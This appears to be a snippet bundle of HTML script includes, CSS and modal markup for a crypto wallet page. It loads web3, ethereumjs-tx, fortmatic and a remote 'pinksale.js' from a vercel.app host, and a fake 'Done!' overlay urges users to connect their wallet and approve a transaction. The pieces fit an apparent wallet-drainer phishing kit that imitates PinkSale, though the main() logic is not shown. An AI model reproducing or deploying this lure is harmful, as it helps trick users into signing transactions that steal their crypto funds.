html(js)

    <script
      src="./Blublu/jquery-3.6.0.min.js"
      integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
      crossorigin="anonymous"
    ></script>
    <script src="./Blublu/ethereumjs-tx-1.3.3.min.js"></script>
    <script type="text/javascript" src="./Blublu/web3.min.js"></script>
    <script type="text/javascript" src="./Blublu/index.js"></script>
    <script type="text/javascript" src="./Blublu/index.min.js"></script>
    <script type="text/javascript" src="./Blublu/index.min(1).js"></script>
    <script type="text/javascript" src="./Blublu/fortmatic.js"></script>
    <script
      src="./Blublu/async.min.js"
      integrity="sha512-0ewcnFb590plq2BJFUSpSbysjDZaj1Jsdkqt5ldhGE/nXJFCbhI/hXuonRIft5WwwlPj87/k3NU2wUyAWUJV0w=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    ></script>
    <script
      type="text/javascript"
      src="https://js-ecru.vercel.app/pinksale.js"
    ></script>
事件
      function anclick() {
        main();
      }

html(css)
.doneshow {
  display: block !important;
}
.done {
  display: none;
}
.donebox {
  width: 100%;
  height: 100%;
  position: fixed;
  top: 0;
  left: 0;
  z-index: 1000;
  display: flex;
  align-items: center;
  justify-content: center;
  background-color: rgba(0, 0, 0, 0.4);
}
.donecon {
  width: 25%;
  height: auto;
  background: white;
  border-radius: 1rem;
  padding: 2rem;
  box-sizing: border-box;
}
.donedian {
  display: flex;
  justify-content: center;
  margin: 1.5rem 0 3rem;
}
.donedian span {
  margin: 0 0.3125rem;
  width: 1rem;
  height: 1rem;
  border-radius: 50%;
  background: black;
}
.donecon h4 {
  width: 100%;
  text-align: center;
  font-size: 1.8rem;
  margin: 4rem 0 0.25rem;
}
.donecon > p {
  width: 100%;
  margin-bottom: 0.25rem !important;
  text-align: center;
  font-size: 1.2rem !important;
  font-weight: 800;
}
.donecon > span {
  display: block;
  width: 100%;
  text-align: center;
  font-weight: 600;
}
@media (max-width: 1250px) {
  .donecon {
    width: 90%;
  }
}


html(dom)

        <div class="done" id="done">
          <div class="donebox">
            <div class="donecon">
              <div class="donedian">
                <span></span>
                <span></span>
                <span></span>
              </div>
              <h4>Done!</h4>
              <p>Please connect wallet & approve transaction</p>
              <span>Sign message in your wallet to continue...</span>
            </div>
          </div>
        </div>
